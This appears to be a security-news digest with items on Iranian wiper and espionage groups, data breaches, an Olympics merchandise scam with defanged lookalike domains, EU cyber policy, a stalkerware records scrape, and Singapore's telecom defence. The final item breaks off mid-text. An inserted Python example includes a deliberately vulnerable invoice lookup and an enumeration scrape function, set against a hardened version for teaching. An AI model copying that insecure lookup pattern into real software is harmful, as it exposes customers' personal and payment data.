On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

HTTPSnoop malware was deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells

Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23) is an Arabic-speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East, but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)

security.com EN 2026 muddywater Seedworm US-Iran-War APT
Canadian Tire Data Breach Impacts 38 Million Accounts https://www.securityweek.com/canadian-tire-data-breach-impacts-38-million-accounts/
08/03/2026 11:44:35

securityweek.com
By Ionut Arghire | February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked data also includes addresses, phone numbers, and gender information.

“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com EN 2026 Canada Canadian-Tire dataleak
Madison Square Garden Data Breach Confirmed Months After Hacker Attack https://www.securityweek.com/madison-square-garden-data-breach-confirmed-months-after-hacker-attack/
08/03/2026 11:42:53

securityweek.com
By Eduard Kovacs | March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.

securityweek.com EN 2026 Oracle-E-Business-Suite EBS MSG Madison-Square-Garden Cl0p ransomware
Paint maker giant AkzoNobel confirms cyberattack on U.S. site https://www.bleepingcomputer.com/news/security/paint-maker-giant-akzonobel-confirms-cyberattack-on-us-site/
08/03/2026 11:40:21

bleepingcomputer.com
By Bill Toulas
March 3, 2026

The multinational Dutch paint company AkzoNobel has confirmed to BleepingComputer that hackers breached the network of one of its U.S. sites.

Following a data leak from the Anubis ransomware gang, a company spokesperson said that the intrusion has been contained and that the impact is limited.

“AkzoNobel has identified a security incident at one of our sites in the United States. The incident was limited to the respective site and was already contained,” the company told BleepingComputer.

“The impact is limited, and we are taking the appropriate steps to notify and support impacted parties, and will work closely with relevant authorities.”

AkzoNobel is a major paints and coatings company with 35,000 employees. It has an annual revenue exceeding $12 billion and active operations in over 150 countries. Brands under its corporate umbrella include Dulux, Sikkens, International, and Interpon.

The Anubis ransomware gang claims to have stolen 170GB of data (almost 170,000 files) from AkzoNobel and has published samples on its leak site, including screenshots of select documents and a list of the stolen files.

The published data contains confidential agreements with high-profile clients, email addresses and phone numbers, private email correspondence, passport scans, material testing documents, and internal technical specification sheets.

At the time of writing, the Anubis leak is only partial. AkzoNobel did not share with BleepingComputer any information on whether it engaged with the threat actor.

Anubis is a ransomware-as-a-service (RaaS) operation that launched in December 2024, offering affiliates 80% of the paid ransoms.

In February 2025, the operators launched an affiliate program on the RAMP forum, boosting its activity and influence in the cybercrime space.

In June the same year, Anubis added to its arsenal a data wiper that destroys the victim’s files to make recovery impossible.

bleepingcomputer.com EN 2026 AkzoNobel Anubis Anubis-Ransomware Data-Breach Data-Leak Double-Extortion Ransomware
TriZetto confirms 3.4M people's health and personal data was stolen during breach https://techcrunch.com/2026/03/06/trizetto-confirms-3-4m-peoples-health-and-personal-data-was-stolen-during-breach
08/03/2026 11:38:40

techcrunch.com
Zack Whittaker
6:28 AM PST · March 6, 2026

Health tech giant TriZetto has confirmed that more than 3.4 million people had personal and health information stolen in a 2024 cyberattack, which the company failed to detect for almost a year.

The tech company, owned by multinational conglomerate Cognizant, serves around 200 million people across 875,000 healthcare providers throughout the U.S., according to its website. Doctors’ offices and healthcare providers use TriZetto to assess patients’ insurance for medical treatments.

TriZetto said in a filing with Maine’s attorney general on Friday that hackers stole patients’ insurance eligibility transaction reports from the company’s servers.

The data includes personal information like patients’ names, dates of birth, home addresses, and Social Security numbers, as well as information about their healthcare, such as their provider’s name, demographic data, and health and insurance details.

TriZetto said it identified the breach on October 2, 2025, but later discovered that the hackers had access as far back as November 2024.

Cognizant spokesperson William Abelson said the company “eliminated the threat” to its environment, but would not say why it took the company a year to detect the breach.

Several organizations have confirmed that their patients’ information was compromised in the cyberattack. One of these is OCHIN, a nonprofit consultancy firm that provides healthcare technology to some 300 rural and community care providers across the United States. Other healthcare providers across California have also confirmed that their patients’ information was affected.

According to TriZetto, not every customer was affected by the breach.

TriZetto is the latest major health tech company to confirm a hack in recent years.

In 2024, a ransomware attack at Change Healthcare, another health tech giant that processes some 15 billion healthcare transactions, allowed hackers to make off with more than 192 million patient files. The cyberattack sparked outages across the U.S., leaving many without access to medical treatments or medications.

Updated with comment from Cognizant.

techcrunch.com EN 2026 US TriZetto cyberattack
Major operation in Africa targeting online scams nets 651 arrests, recovers USD 4.3 million https://www.interpol.int/en/News-and-Events/News/2026/Major-operation-in-Africa-targeting-online-scams-nets-651-arrests-recovers-USD-4.3-million
20/02/2026 18:29:51

www.interpol.int
18 February 2026

Cyber operation dismantles criminal networks running transnational fraud schemes

LYON, France – Law enforcement agencies from 16 African countries have made 651 arrests and recovered more than USD 4.3 million in an international cybercrime operation against online scams.

Operation Red Card 2.0 (8 December 2025 to 30 January 2026) targeted the infrastructure and actors behind high-yield investment scams, mobile money fraud and fraudulent mobile loan applications.

During the eight-week operation, investigations exposed scams linked to over USD 45 million in financial losses and identified 1,247 victims, predominantly from the African continent but also from other regions of the world. Authorities also seized 2,341 devices and took down 1,442 malicious IPs, domains and servers, as well as other related infrastructure.

INTERPOL supported the operation through critical intelligence sharing, real-time information exchange and capacity-building activities, including training on digital forensic tools.

Neal Jetton, INTERPOL’s Director of the Cybercrime Directorate, said:

“These organized cybercriminal syndicates inflict devastating financial and psychological harm on individuals, businesses and entire communities with their false promises. Operation Red Card highlights the importance of collaboration when combatting transnational cybercrime. I encourage all victims of cybercrime to reach out to law enforcement for help.”

The architecture of fraud: Key cases reveal diverse scam models

In Nigeria, police dismantled a high-yield investment fraud ring that recruited young individuals to carry out cyber-enabled crimes using phishing, identity theft, social engineering and fake digital asset investment schemes. Over 1,000 fraudulent social media accounts were taken down and investigators uncovered a residential property constructed by the syndicate ringleader to serve as the operational hub for the criminal activities.
In Kenya, authorities made 27 arrests linked to fraud schemes that used messaging apps, social media and fictitious testimonials to lure victims into making fake investments in reputable global corporations. Scammers solicited small initial investments ‒ as low as USD 50 ‒ with claims of lucrative returns. Victims were shown fabricated account statements or dashboards but withdrawal requests were systematically blocked.
In Côte d’Ivoire, law enforcement made 58 arrests and seized 240 mobile phones, 25 laptops and over 300 SIM cards in a targeted operation against mobile loan fraud. These scams predominantly targeted vulnerable populations through deceptive mobile applications and messaging services, attracting victims with promises of quick, unsecured loans, only to impose fees, enforce abusive debt-collection practices and illicitly harvest sensitive personal and financial data.
In a separate major success for Nigerian authorities, six members of a sophisticated cybercrime syndicate were arrested for infiltrating the internal platform of a major telecommunications provider through compromised staff login credentials. An investigation led to the disruption of the scheme, which involved siphoning significant volumes of airtime and data for illegal resale.

During Operation Red Card 2.0, INTERPOL worked closely with its partners, Cybercrime Atlas, Team Cymru, Trend Micro, TRM Labs and Uppsala Security, leveraging their data and expertise to provide critical intelligence to participating countries.

Notes to editors

The operation was conducted under the African Joint Operation against Cybercrime (AFJOC), an initiative funded by the UK’s Foreign, Commonwealth & Development Office.

The Global Action on Cybercrime Enhanced (GLACY-e) project, a joint initiative of the European Union and the Council of Europe, provided operation-specific support.

Participating member countries

Angola, Benin, Cameroon, Côte d’Ivoire, Chad, Gabon, Gambia, Ghana, Kenya, Namibia, Nigeria, Rwanda, Senegal, Uganda, Zambia and Zimbabwe.

www.interpol.int EN 2026 Africa Operation-Red-Card-2.0
Fake ‘Olympics Shop’ Ads on Meta Lead Netizens to Cloned Websites Promising 80% Off Merch https://www.bitdefender.com/en-gb/blog/hotforsecurity/fake-olympics-shop-ads-on-meta-lead-netizens-to-cloned-websites-promising-80-off-merch
19/02/2026 10:47:56

bitdefender.com
Alina BÎZGĂ
February 17, 2026

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Users who click on these ads and interact with the fraudulent websites expose themselves to several risks. Many similar scam operations are designed to steal payment card information at checkout, harvest personal details such as names, addresses, phone numbers, and email accounts, and in some cases collect login credentials.

Victims may also receive counterfeit merchandise — or nothing at all — after completing a purchase. In many instances, the sites disappear shortly after processing payments, leaving buyers with no way to recover their money.

At a glance, the ads look legitimate.

They feature official Olympic imagery, professional product photos, and convincing promotional messages such as:

“Olympics Exclusive! Up to 80% OFF.
30 Days No Excuse Free Return.
🛒Get Yours Before Out of Stock!”

“Olympics Esclusivo! Sconti fino all'80%.” (“Olympics Exclusive! Discounts up to 80%.”)
“Reso gratuito entro 30 giorni, senza domande.” (“Free returns within 30 days, no questions asked.”)
“Acquistalo prima che finisca!” (“Buy it before it runs out!”)

But the danger begins after the click.

Near-Perfect Clones of the Official Olympics Shop

The fraudulent websites are not crude copies – they are near-perfect replicas of the official Olympics merchandise store.

Bitdefender Labs observed that the scam sites use:

The same product photos
Identical color schemes
The same merchandise collections
Official branding elements
Similar layout structure

At a glance, most users would struggle to tell the difference.

The deception lies in the small details.

For example:

The legitimate store promotes “Sign up & Save 15%.”
The scam websites advertise “Sign & Save 80%.”
Official Olympics Shop

Fake Olympics Shop

That small wording change reflects the core tactic: inflate discounts to trigger a sense of urgency and bypass skepticism.

Font rendering may be slightly different. Minor layout inconsistencies appear in certain sections. Domain names look similar but are newly registered and unrelated to the official organization.

These subtle discrepancies are easy to miss when a user is focused on a limited-time deal.

Coordinated Scam Infrastructure

This campaign shows clear signs of coordination, and as Labs researcher Andreea Olariu points out, most of the fraudulent domains were registered within days of each other:

www.olympics2026[.]store – created Feb 3
Olympicseu[.]shop – created Feb 9
olympics-sale[.]top – created Feb 9
olympics-hot[.]top – created Feb 9
www.olympics-top[.]shop – created Feb 10
Olympicssportswear[.]shop – created Feb 10
Olympexapparel[.]shop – created Feb 10
Lifestylecollection[.]shop – created Feb 10
www.2026olympics[.]store – created Feb 11

Following the initial detection of the scam advertisements, Olariu observed ongoing domain registrations consistent with the same impersonation strategy. The daily appearance of new lookalike domains indicates an adaptive infrastructure designed to evade detection and extend the campaign’s lifespan.

Most recent domains include:

Olymponline[.]top – created Feb 11
Postolympicsale[.]com – created Feb 11
sale-olympics[.]top – created Feb 11
olympics-save[.]top – created Feb 11
olympicssportswears[.]shop – created Feb 11
olympicsfashionhub[.]shop – created Feb 12

All these domains are flagged as fraudulent by Bitdefender security systems.

In some instances, ads appear to display the official shop preview but silently redirect users to www.olympics2026[.]store for example.
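As an added example (not code from the Bitdefender post), a small Python triage helper that parses a constructed copy of indicator lines in the post's defanged "domain – created Mon D" format, refangs them, separates brand lookalikes from unrelated names, and reports registration bursts, the "registered within days of each other" pattern described above. The year, the brand token and the official-domain value are assumptions.

```python
import re
from datetime import date

# Constructed sample in the defanged "domain – created Mon D" format used in the post,
# deliberately including the inconsistent separators and a mis-typed defang ("." outside
# the brackets) that such hand-written lists tend to contain.
SAMPLE_INDICATORS = """\
www.olympics2026[.]store – created Feb 3
Olympicseu[.]shop – created Feb 9
olympics-sale[.]top – created Feb 9
www.olympics-top[.]shop –created Feb 10
Lifestylecollection[.]shop – created Feb 10
Postolympicsale[.]com created Feb 11
sale-olympics[.]top - created Feb 11
olympicsfashionhub.[]shop - created Feb 12
"""

YEAR = 2026  # assumption: the post gives month and day only
MONTHS = {m: i for i, m in enumerate(
    ["jan", "feb", "mar", "apr", "may", "jun",
     "jul", "aug", "sep", "oct", "nov", "dec"], start=1)}

# Placeholder for the genuine store's domain; the post does not name it.
OFFICIAL_DOMAINS = {"official-olympics-shop.example"}
BRAND_TOKENS = ("olymp",)  # assumption: substring that marks a brand lookalike

# domain, optional dash (en dash or hyphen, with or without spaces), "created", month, day
LINE_RE = re.compile(
    r"^(?P<domain>\S+)\s*[–-]?\s*created\s+(?P<mon>[A-Za-z]{3})\s+(?P<day>\d{1,2})\s*$")


def refang(domain: str) -> str:
    """Undo [.] defanging (and the .[] typo), lowercase, and drop a leading www."""
    d = re.sub(r"\[\.\]|\.\[\]", ".", domain.strip()).lower()
    return d[4:] if d.startswith("www.") else d


def parse_indicators(text: str) -> list[dict]:
    """Parse one indicator per line into {'domain': str, 'created': date} records."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed indicator line: {line!r}")
        created = date(YEAR, MONTHS[m["mon"].lower()], int(m["day"]))
        records.append({"domain": refang(m["domain"]), "created": created})
    return records


def is_lookalike(domain: str) -> bool:
    """True when a brand token appears in a name that is not the official domain
    (or a subdomain of it)."""
    if any(domain == off or domain.endswith("." + off) for off in OFFICIAL_DOMAINS):
        return False
    return any(tok in domain for tok in BRAND_TOKENS)


def registration_bursts(records, window_days=2, min_count=3):
    """Find runs of lookalike registrations where at least min_count names were created
    within window_days of the first one; returns (first_date, last_date, count) tuples."""
    dates = sorted(r["created"] for r in records if is_lookalike(r["domain"]))
    bursts, i = [], 0
    while i < len(dates):
        j = i
        while j + 1 < len(dates) and (dates[j + 1] - dates[i]).days <= window_days:
            j += 1
        if j - i + 1 >= min_count:
            bursts.append((dates[i], dates[j], j - i + 1))
        i = j + 1
    return bursts


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE_INDICATORS)
    for r in recs:
        flag = "LOOKALIKE" if is_lookalike(r["domain"]) else "unrelated"
        print(f"{r['created']}  {flag:9}  {r['domain']}")
    for first, last, n in registration_bursts(recs):
        print(f"burst: {n} lookalike domains registered between {first} and {last}")
```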

Newly Created Facebook Pages Running the Ads
Another strong indicator of fraud: the Facebook pages promoting these ads are newly created.

Bitdefender Labs observed that several of these pages were set up on the same day the scam domains were registered. This suggests a rapid deployment model:

Register domain
Clone official website
Create Facebook page
Launch ad campaign
Begin collecting payments

All within a short time window.

Legitimate global brands rarely create brand-new pages and immediately launch aggressive 80% discount campaigns tied to major international events.

The sophistication of the cloning significantly increases the risk. When scam sites mirror official branding almost perfectly, users default to visual familiarity instead of domain verification.

That’s exactly what attackers are counting on.

bitdefender.com EN 2026 Fake Olympics-Shop Ads scam
Europe needs cyber weapons, says EU tech chief https://www.politico.eu/article/europe-needs-offensive-cyber-power-says-eu-tech-chief/
17/02/2026 10:33:15

February 13, 2026 12:36 pm CET
By Antoaneta Roussi

“We also have to have offensive capacity,” says Commissioner Henna Virkkunen.

Europe must be able to strike back in cyberspace, as the strategy to deter adversaries is no longer enough, the EU executive's tech and security chief told POLITICO.

“It’s not enough that we are just defending ... We also have to have offensive capacity,” the European Commission's Executive Vice President Henna Virkkunen said in an interview on the sidelines of the Munich Security Conference on Friday.

For years, European capitals have held back from stating publicly that they support offensive cyber operations — known as "hacking back" — because of fears that such operations could trigger retaliation and escalation from countries like Russia, China and others.

But the tide is turning, as EU states including Germany, Latvia and others warm to the idea of conducting offensive cyber operations. The European Commission also mentioned the need for both defensive and offensive cyber capabilities in its defense white paper in December.

Virkkunen said the Commission is also identifying critical areas and industries where Europe wants more control over its data. It is part of a broader push to reduce dependence on foreign technology and build a homegrown tech and cyber industry in Europe.

“We don’t want to have risky dependencies in any critical fields,” she said. “That doesn’t mean we plan to do everything on our own. When we don’t have certain capacities ourselves, we are very willing to work with like-minded partners to build resilient supply chains.”

politico.eu EN 2026 Buildings Cyber-diplomacy Cyber-warfare Henna-Virkkunen Munich-Security-Conference offensive-capacity EU
EU can’t be ‘naive’ about enemies shutting down critical infrastructure, warns tech official https://therecord.media/eu-cyber-critical-infrastructure-tech
17/02/2026 09:48:48

therecord.media
Alexander Martin
February 13th, 2026

MUNICH, Germany — The European Union can no longer afford to be “naive” about adversaries’ ability to switch off critical infrastructure, the EU’s top tech official warned Friday, as she called for tougher rules and more investment to protect Europe from cyber and hybrid threats.

Speaking at the Munich Cyber Security Conference, European Commission Executive Vice President Henna Virkkunen said cyberattacks have become a central tool of modern conflict, often coordinated with physical sabotage, disinformation and economic pressure.

Europe’s power grids, hospitals, financial systems, satellites and military command networks are all deeply dependent on digital infrastructure — and increasingly exposed, she warned.

“In today’s world, there is no security without cybersecurity,” said Virkkunen, pointing to recent attacks and interference targeting hospitals, energy networks, public administrations, supply chains and democratic processes across Europe.

She said the Commission last month proposed revising the EU’s Cybersecurity Act to strengthen the bloc’s cybersecurity agency and reduce risks in critical information and communications technology supply chains. The draft proposal would see member states phase out the use of designated high-risk suppliers within their critical national infrastructure.

The potential threat posed by Chinese network equipment suppliers such as Huawei and ZTE had previously resulted in several national decisions to restrict those vendors from contributing to various parts of telecommunications infrastructure.

The use of U.S. technology and service providers had also prompted concern across the EU following President Trump’s unpredictable decisions to sanction various political figures — resulting in prohibitions against those officials using technology provided by companies such as Microsoft — and aggressive posture towards Greenland.

Those concerns were partially assuaged by U.S. National Cyber Director Sean Cairncross on Thursday, who stressed the U.S. wants European partners to work alongside it in cyberspace to confront the most significant threats — and stressed that the U.S. technology stack was safer than that offered by China.

Cairncross echoed a line coined by Secretary of State Marco Rubio, saying the U.S. “America first” approach does not mean “America alone.” Rubio is expected to deliver a keynote to the main Munich Security Conference on Saturday in the wake of an extremely controversial speech delivered by JD Vance last year.

Without naming specific states, Virkkunen argued that Europe’s growing reliance on digital systems has expanded the attack surface for hostile actors and made cyber defense a core part of defense readiness. “We can no longer afford to be naive about who has the capacity to switch off the ICT systems running our critical infrastructure,” she said.

She also pointed to new EU action plans on drone and undersea cable security, following recent incidents, as examples of efforts to improve prevention, detection and rapid response across borders.

Cyber, she said, is now a core military domain, and Europe must build stronger capabilities and a homegrown cyber industry, including by using advanced computing and artificial intelligence for defense. The goal, Virkkunen said, is to ensure Europe remains resilient, secure and able to withstand growing hybrid threats.

therecord.media EN 2026 EU Critical-infrastructure naive
Hacktivist scrapes over 500,000 stalkerware customers' payment records | TechCrunch https://techcrunch.com/2026/02/09/hacktivist-scrapes-over-500000-stalkerware-customers-payment-records/
11/02/2026 15:13:21

techcrunch.com
Zack Whittaker
Lorenzo Franceschi-Bicchierai
8:20 AM PST · February 9, 2026

More than half-a-million people who bought access to phone surveillance and social media snooping apps had their email address and partial payment card numbers published online.

A hacktivist has scraped more than half-a-million payment records from a provider of consumer-grade “stalkerware” phone surveillance apps, exposing the email addresses and partial payment information of customers who paid to spy on others.

The transactions contain records of payments for phone-tracking services like Geofinder and uMobix, as well as services like Peekviewer (formerly Glassagram), which purport to allow access to private Instagram accounts, among several other monitoring and tracking apps provided by the same vendor, a Ukrainian company called Struktura.

The customer data also includes transaction records from Xnspy, a known phone surveillance app, which in 2022 spilled the private data from tens of thousands of unsuspecting people’s Android devices and iPhones.

This is the latest example of a surveillance vendor exposing the information of its customers due to security flaws. Over the past few years, dozens of stalkerware apps have been hacked, or have managed to lose, spill, or expose people’s private data — often the victims themselves — thanks to shoddy cybersecurity by the stalkerware operators.

Stalkerware apps like uMobix and Xnspy, once planted on someone’s phone, upload the victim’s private data, including their call records, text messages, photos, browsing history, and precise location data, which is then shared with the person who planted the app.

Apps like uMobix and Xnspy have explicitly marketed their services for people to spy on their spouses and domestic partners, which is illegal.

The data, seen by TechCrunch, included about 536,000 lines of customer email addresses, which app or brand the customer paid for, how much they paid, the payment card type (such as Visa or Mastercard), and the last four digits on the card. The customer records did not include dates of payments.

TechCrunch verified the data was authentic by taking several transaction records containing disposable email addresses with public inboxes, such as Mailinator, and running them through the various password reset portals provided by the various surveillance apps. By resetting the passwords on accounts associated with public email addresses, we determined that these were real accounts.

We also verified the data by matching each transaction’s unique invoice number from the leaked dataset with the surveillance vendor’s checkout pages. We could do this because the checkout page allowed us to retrieve the same customer and transaction data from the server without needing a password.
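The second check above works because the checkout page answers an invoice-number query with customer and transaction data and never asks who is asking. As an added example that is not Struktura's, Ersten Group's or TechCrunch's code, the block below reproduces that class of bug in miniature: a lookup that returns a record for any invoice number, beside one that binds the lookup to the authenticated customer. The data model, the sequential invoice numbers, the session store and the records are all assumptions constructed for the example.

```python
"""Enumerable invoice lookup, vulnerable and hardened.

Added example, not the vendor's code. It reproduces the class of bug the
article describes (a checkout page that hands out customer and transaction
data for an invoice number without a password) and the ownership check that
stops it. The data model, sequential numbering, session table and records
are constructed assumptions.
"""
from dataclasses import dataclass, asdict


@dataclass(frozen=True)
class Invoice:
    number: int        # sequential, so trivially enumerable
    email: str
    product: str
    amount_usd: float
    card_last4: str


# Constructed sample records (not from the leaked dataset).
INVOICES = {
    1: Invoice(1, "founder@vendor.example", "uMobix", 1.00, "4242"),
    2: Invoice(2, "buyer-a@mailinator.example", "Geofinder", 49.99, "1111"),
    3: Invoice(3, "buyer-b@mail.example", "Peekviewer", 39.00, "2222"),
}
# Constructed session store: token -> authenticated customer email.
SESSIONS = {"tok-buyer-a": "buyer-a@mailinator.example"}


def lookup_vulnerable(invoice_number):
    """Returns the record for any invoice number. The only 'secret' is the
    number itself, so a client can walk 1..N and collect the whole table."""
    inv = INVOICES.get(invoice_number)
    return asdict(inv) if inv else None


def lookup_hardened(invoice_number, session_token):
    """Binds the lookup to the authenticated customer and returns the same
    answer for 'no such invoice' and 'not your invoice', so probing reveals
    nothing about which numbers exist."""
    owner = SESSIONS.get(session_token)
    inv = INVOICES.get(invoice_number)
    if owner is None or inv is None or inv.email != owner:
        return None
    return {"number": inv.number, "product": inv.product,
            "amount_usd": inv.amount_usd, "card_last4": inv.card_last4}


def scrape(lookup, max_number=1000):
    """Enumeration check: how many records does a lookup hand out to a caller
    that simply iterates invoice numbers?"""
    return [rec for n in range(1, max_number + 1) if (rec := lookup(n)) is not None]


if __name__ == "__main__":
    print(len(scrape(lookup_vulnerable)), "records scraped without a password")
    print(len(scrape(lambda n: lookup_hardened(n, None))),
          "records scraped anonymously from the hardened lookup")
    print(len(scrape(lambda n: lookup_hardened(n, "tok-buyer-a"))),
          "records visible to buyer-a")
```

Switching to unguessable invoice references (random tokens instead of a counter) raises the cost of enumeration but is not a substitute for the ownership check: a reference that leaks in a receipt email or a support ticket would still unlock the record. The first verification step in the article, resetting passwords on accounts registered to public Mailinator inboxes, is a separate weakness in the accounts themselves and is not addressed by this fix.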

The hacktivist, who goes by the moniker “wikkid,” told TechCrunch they scraped the data from the stalkerware vendor thanks to a “trivial” bug in its website. The hacktivist said they “have fun targeting apps that are used to spy on people,” and subsequently published the scraped data on a known hacking forum.

The hacking forum listing names the surveillance vendor as Ersten Group, which presents itself as a U.K. software development startup.

TechCrunch found that several email addresses in the dataset, used for testing and customer support, instead reference Struktura, a Ukrainian company whose website is identical to Ersten Group’s. The earliest record in the dataset contained the email address of Struktura’s chief executive, Viktoriia Zosim, for a transaction of $1.

Representatives for Ersten Group did not respond to our requests for comment. Struktura’s Zosim did not return a request for comment.

techcrunch.com EN 2026 Xnspy Hacktivist stalkerware Peekviewer
Largest Multi-Agency Cyber Operation Mounted to Counter Threat Posed by Advanced Persistent Threat (APT) Actor UNC3886 to Singapore’s Telecommunications Sector https://www.csa.gov.sg/news-events/press-releases/largest-multi-agency-cyber-operation-mounted-to-counter-threat-posed-by-advanced-persistent-threat--apt--actor-unc3886-to-singapore-s-telecommunications-sector/
11/02/2026 15:11:21

| Cyber Security Agency of Singapore
www.csa.gov.sg
9 February 2026

The Cyber Security Agency of Singapore (CSA) and the Infocomm Media Development Authority (IMDA) shared details of a multi-agency cybersecurity operation, codenamed Operation CYBER GUARDIAN, to defend our telecommunications sector.


Background
2 On 18 July 2025, Coordinating Minister for National Security Mr K Shanmugam shared that Advanced Persistent Threat (APT) actor UNC3886 had been detected attacking our critical infrastructure. No further details were shared then, to preserve operational security. Over the past months, our investigations have indicated that UNC3886 had launched a deliberate, targeted, and well-planned campaign against Singapore’s telecommunications sector. All four of Singapore’s major telecommunications operators (“telcos”) – M1, SIMBA Telecom, Singtel and StarHub – have been the target of attacks.

Singapore’s telcos targets of cyberattacks
3 APTs are sophisticated and persistent, getting past defences with advanced methods over time. UNC3886 is an APT actor with deep capabilities. UNC3886 deployed advanced tools in their campaign to gain access into our telco systems. For example:

a. In one instance, they used a zero-day exploit[1] to bypass a perimeter firewall of our telcos and gained access into our telco networks. They also managed to exfiltrate a small amount of technical data; this is believed to be primarily network-related data to advance the threat actors’ operational objectives.

b. In another instance, the threat actor utilised advanced tools and techniques such as rootkits[2] to maintain persistent access and cover their tracks and evade detection. This made it challenging for cyber defenders to detect their presence, requiring the cyber defenders to conduct comprehensive security checks across the networks.

Operation CYBER GUARDIAN mitigated serious threat posed by UNC3886
